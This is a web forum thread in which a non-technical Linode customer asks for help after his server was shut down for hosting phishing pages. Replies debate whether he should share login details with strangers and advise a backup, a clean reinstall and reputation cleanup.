Urgent help needed....! Need to remove a phishing site...

Hi there

I am a website owner but not at all technical and the person who set up my sites has abandoned me it seems as he is not answering any emails ;(

I hope someone here can help. I received notification today that LInode has powered down my sites as a result of a phishing site residing on my space. I have no idea how to fix this but I really help someone here can help as I desperately need to get things back up online and having just moved country, I know no-one locally to help either. It's all a bit bad timing…

The details from Linode support are:

Your Linode is still powered down, however we're forwarding these complaints for your reference.

We have received a report of a phishing website hosted on an IP address assigned to your Linode:

http://americaselitegroup.com/red.html

We have received two additional abuse complaints regarding the phishing web site located at the following URL:

http://americaselitehotels.com/eBay.html

When you are available to investigate this issue, we kindly ask that you carry out the investigation using the Finnix Recovery distribution:

http://library.linode.com/troubleshooti … escue-mode">http://library.linode.com/troubleshooting/finnix-rescue-mode

My account is 48195 and I will happily let you have whatever other log in details to see what is going on if someone is kind enough to be able to take a look…

Thanks guys

Bart

10 Replies

I'll see if I can help you, add me on Skype: gladosdan

really? i dont mean to be rude.. but really?

youve been compromised in some way that your hosting phishing websites, and now your just gonna let someone from a forum log into your node?

@Internat:

really? i dont mean to be rude.. but really?

youve been compromised in some way that your hosting phishing websites, and now your just gonna let someone from a forum log into your node?

This guy is criminally negligent. Linode have been very nice to him by just powering down his Linode. As he is clearly not able to manage a virtual machine he should consider something safer like simple web hosting from hostgator.

That seems a bit harsh. To me it sounds like the OP believed he had a technical resource to support him, until the lack of response for this particular issue. Regardless, it's certainly not the only time the forums have been used to find consulting or other assistance, which I'd assume would include some references.

To the OP, it's possible this won't qualify since Linode didn't mention it in their own communication (and they said they wouldn't necessarily take all requests) but you might try opening a ticket to see if they would assist you as part of their trial of managed services (http://forum.linode.com/viewtopic.php?t=8349)

– David

> That seems a bit harsh. To me it sounds like the OP believed he had a technical resource to support him, until the lack of response for this particular issue. Regardless, it's certainly not the only time the forums have been used to find consulting or other assistance, which I'd assume would include some references.

im all for the forums being used for advise, and help, thats what they are for. But he does say ill give you the log in details for it.. Thats what i have an issue with.

@Internat:

im all for the forums being used for advise, and help, thats what they are for. But he does say ill give you the log in details for it.. Thats what i have an issue with.
What issue? It's not like he was posting the information right in the forum. How would you expect a consultant/contractor to work on his node without that information?

– David

@db3l:

That seems a bit harsh.

Yes, indeed. I was absolutely harsh but I was also fair.

If you let organized crime run a gambling club in your living room and the police come around, turn the lights off, then leave, I think you would have got off rather lightly. Not knowing you are breaking the law is never an excuse.

Professionally I'd be rather interested in what the phishers did to his Linode though. I'm guessing they got in with a guessable or reused password but maybe it was an exploit in some CGI script or suchlike.

No I do not believe that some of the reactions to this is too harsh. If the linode has been truly compromised by someone that is able to place their own files on the OS level, the only really correct action is to

1- back up the device (for later analasys or data retrieval)

2- shut it down

3- reinstall the linode from scratch taking into account current security guidelines.

Once a system has been compromised, there is really no way to %100 be sure that there is no other "backdoor" that has been installed that would reopen the system for another breakin once the phishing pages have been removed.

What we do not know here is if the original "consultant" here was running the phishing sites without the linode owner knowing or if the machine was compromised due to weak passwords/ etc.

I too have run into too many "owners" willing to essentially turn over the "keys to the kingdom" with very little background checks on whom they are willing to trust with what is essentially their reputations, and in the long run, linode.com's reputation…

That is ONE of the many reasons we have so many botnets out there….

@TeddyR42:

No I do not believe that some of the reactions to this is too harsh. If the linode has been truly compromised by someone that is able to place their own files on the OS level, the only really correct action is to

1- back up the device (for later analasys or data retrieval)

2- shut it down

3- reinstall the linode from scratch taking into account current security guidelines.
And hopefully most contractors would end up following a similar path.

It just seems unfortunate to me that following what was essentially a plea for help, the trend seemed to be to blame the OP for creating the scenario rather than offering suggestions on what to do.

I suppose this is veering off topic further, but if the OP is not expert enough to do this, how would you suggest a resource be located? It seems to me this forum should be a legitimate means to at least ask for assistance, and if anything might garner folks who are familiar with Linode. As I noted earlier, it's not the first time there have been requests here to help with management tasks. The inital post was pretty up front with the state of affairs, and the lack of an expected resource.

It would be nice if other responses offered other avenues of finding such support if in fact the belief is that doing so here is wrong or exhibits bad judgement. Just declaring the OP to be a bad operator, sans other suggestions, and knowing very few details about the situation, still seems a harsh response, or at least less than helpful.

> Once a system has been compromised, there is really no way to %100 be sure that there is no other "backdoor" that has been installed that would reopen the system for another breakin once the phishing pages have been removed.

What we do not know here is if the original "consultant" here was running the phishing sites without the linode owner knowing or if the machine was compromised due to weak passwords/ etc.
I don't really disagree with this, but again, it seems to me the OP was simply trying to get assistance to, in fact, repair the damage. The damage itself is already done, his Linode is already shut down, so the question at hand is how to proceed, and lacking the necessary expertise himself, how to find it.

> I too have run into too many "owners" willing to essentially turn over the "keys to the kingdom" with very little background checks on whom they are willing to trust with what is essentially their reputations, and in the long run, linode.com's reputation…
The implication being that the OP falls into this category? Any concrete suggestions (to go along with the rant) on how to determine who he should be willing to trust?

– David

PS: I can totally sympathize with the concern over poorly managed machines being potential vectors for spam and other abuse. I just think the goal should be to assist the OP in resolving the issue at hand.

Besides fixing your sites (hopefully you had good backups - like all the other advice - you really need to scrub the old site and start fresh), don't forget to "clear" your reputation.

Netcraft reports "This phishing site has been blocked by the Netcraft Toolbar. " for your site.

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Community Code of Conduct